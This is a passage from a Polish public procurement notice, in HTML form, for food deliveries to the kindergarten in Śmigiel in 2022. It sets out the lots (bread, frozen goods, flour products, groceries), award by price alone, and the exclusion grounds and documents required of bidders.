potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/><br/>4)	PAKIET IV – pieczywo,<br/><br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/>5)	PAKIET V – mrożonki i ryby mrożone<br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/><br/>6)	PAKIET VI – wyroby mączne,<br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15851000-8 - Produkty mączne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest zakup i dostawa artykułów żywnościowych dla Przedszkola w Śmiglu, Al. Bohaterów 7, 64-030 Śmigiel na rok 2022.<br/>2.	Zamawiający zgodnie z pkt 2.6 SWZ dopuszcza możliwość składania ofert częściowych (podział na PAKIETY) według poniższych zasad:<br/>7)	PAKIET VII – artykuły ogólnospożywcze.<br/>3.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w Części III SWZ.<br/>4.	Zamówienie obejmuje sukcesywną dostawę do Przedszkola w Śmiglu poszczególnych artykułów spożywczych, których wykaz oraz szacowane ilości określone zostały <br/>w Części III SWZ – Opisie przedmiotu zamówienia oraz w Załączniku nr 4 (A-G) do SWZ – Formularzu Cenowym.<br/>5.	Zamawiający informuje, że ilości określone w Formularzu cenowym mają charakter szacunkowy i mogą ulec zmianie w trakcie trwania realizacji umowy. Podane ilości <br/>w Formularzu Cenowym – Załącznik nr 4 (A-G), należy przyjąć do skalkulowania ceny oferty w celu porównania ofert. Ostateczna ilość poszczególnych artykułów będzie wynikała z faktycznych potrzeb Zamawiającego.<br/>6.	Zamawiający zastrzega sobie prawo do nie wykorzystania w całości lub części przedmiotu zamówienia w czasie obowiązywania umowy. Jeżeli jego potrzeby rzeczywiste będą mniejsze od ilości określonej w przedmiocie zamówienia, Zamawiający ma prawo odstąpić od dalszych zakupów artykułów spożywczych bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy. <br/>7.	Wykonawca zobowiązuje się dostarczyć Zamawiającemu przedmiot zamówienia sukcesywnie, na podstawie zamówień określających asortyment i ilość.<br/>8.	Termin dostawy i ilość wybranych artykułów żywnościowych Zamawiający będzie uzgadniał każdorazowo z Wykonawcą telefonicznie.<br/>9.	Wykonawca zobowiązuje się do dostawy towaru zgodnie ze złożoną ofertą w ilościach i terminach określonych w SWZ i umowie.<br/>10.	Nie dopuszcza się stosowania zamienników o innych parametrach niż opisane <br/>w Formularzu cenowym.<br/>11.	Dostawy artykułów spożywczych objętych niniejszym postępowaniem Wykonawca wykona na własny koszt. Wykonanie dostawy obejmuje również czynności rozładunku i dostarczenie towaru do magazynów przedszkolnych wskazanych w umowie. Następnie upoważniony pracownik Zamawiającego potwierdza odbiór towaru.<br/>12.	Wykonawca gwarantuje, że dostarczone artykuły żywnościowe będą zgodne <br/>z obowiązującymi przepisami, w szczególności:<br/>1)	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. <br/>z 2020 r., poz. 2021 ze zm.),<br/>2)	Rozporządzenia Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełnić środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach (Dz. U. z 2016 r., poz. 1154),<br/>3)	Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2021 r., poz. 630),<br/>4)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego <br/>(t.j. Dz. U. z 2020 r., poz. 1753),<br/>5)	Rozporządzenia Parlamentu Europejskiego i Rady (WE nr 1333/2008, WE nr 852/2004, WE nr 854/2004, WE 178/2002). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający oceni i porówna jedynie te oferty, które: <br/>1)	zostały złożone przez wykonawców spełniających warunki udziału w postępowaniu i nie podlegających wykluczeniu,<br/>2)	nie zostały odrzucone przez Zamawiającego. <br/><br/>2.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>1)	kryterium ceny – waga kryterium 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach wskazanych w art. 108 ust. 1 ustawy PZP.<br/>2.	Zamawiający przewiduje ponadto wykluczenie z udziału w przedmiotowym postepowaniu Wykonawcy:<br/>1)	w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury (podstawa prawna – art. 109 ust. 1 pkt 4 ustawy PZP).<br/>3.	Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>4.	Wykonawca nie podlega wykluczeniu na zasadach i na warunkach określonych <br/>w art. 109 ust. 3 oraz art. 110 ust. 2 ustawy PZP.<br/>5.	Okres wykluczenia Wykonawcy z postępowania określony został w art. 111 ustawy PZP.<br/>6.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału <br/>w postępowaniu o udzielenie zamówienia publicznego Zamawiający będzie żądał <br/>od Wykonawcy, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych:<br/>1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r., poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej <br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – sporządzony według wzoru stanowiącego Załącznik nr 3 do SWZ,<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – Zamawiający samodzielnie pobierze przedmiotowe dokumenty z dostępnych rejestrów, jeżeli może <br/>to ustalić z udostępnionych przez Wykonawcę danych.<br/>7.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:<br/>1)	odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, o których mowa w pkt 5.6.2) powyżej – składa dokument lub dokumenty wystawione w kraju, w którym wykonawca <br/>ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator <br/>lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej <br/>z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>8.	Dokumenty, o których mowa w pkt 7.1) powyżej powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>9.	W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do oświadczeń <br/>i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają <br/>w szczególności przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie rodzajów podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej <br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie 